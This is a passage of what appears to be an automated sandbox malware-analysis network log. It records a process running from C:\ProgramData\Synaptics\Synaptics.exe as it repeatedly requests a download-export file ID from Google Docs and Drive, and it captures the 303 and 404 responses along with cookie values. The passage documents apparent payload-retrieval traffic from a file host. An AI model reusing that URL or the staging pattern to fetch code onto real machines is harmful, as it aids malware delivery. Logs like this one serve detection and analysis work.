                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    51192.168.2.449825142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:22 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:22 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC7NrePA23nqr-8VPuk6xdVxqE0KvVtHdWOjxKsVlOH960v7IzzLABjXhCMmaoOehB39
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:22 GMT
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-nWhDCUM-AT6CAjgiwygedw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:22 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:22 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4a 61 5a 34 63 50 72 34 50 4b 45 4b 43 6f 48 4c 33 6b 6f 61 4b 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="JaZ4cPr4PKEKCoHL3koaKw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:22 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    52192.168.2.449827142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:22 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                                                                                                                                                    2024-12-30 03:59:23 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:23 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-09Vv-xMslZ4cEXMYBE9FzA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    53192.168.2.449826142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:22 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                                                                                                                                                    2024-12-30 03:59:23 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:23 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-v53Fe4yPNSDxoeTvbbaXqQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    54192.168.2.449832142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:23 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                                                                                                                                                    2024-12-30 03:59:24 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:24 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-SBeNGRTz8h7SEXg1F1n3vg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    55192.168.2.449833142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:23 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:24 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC7_3KorrprvN0ITSvJTREZ9_I7H0v2rbI2RiSyJfPNvJPmZA0nkXnfu0kUR0yIW-pzL
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:24 GMT
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-hOMixjnidXGtbZf0VuXjjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:24 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:24 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 41 4b 74 4a 4f 35 4b 6d 6f 2d 69 4e 69 4b 70 79 41 4b 64 66 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="tAKtJO5Kmo-iNiKpyAKdfg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:24 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    56192.168.2.449830142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:23 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:24 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC5KZgvyVJBcXjzp-d0nimYBH1x6KvptOFlwHqy9lBnJq8Hpz17cZAs9ZnjlEXEsHnTJ
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:24 GMT
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-_5AldXTFMO78Tgwb3_UBqg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:24 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:24 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6d 76 6b 51 41 51 33 62 46 59 32 55 36 57 73 61 61 76 4e 46 44 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="mvkQAQ3bFY2U6WsaavNFDg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:24 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    57192.168.2.449831142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:23 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                                                                                                                                                    2024-12-30 03:59:24 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:24 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ngCiOefxyJpzJcpYasGWFw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
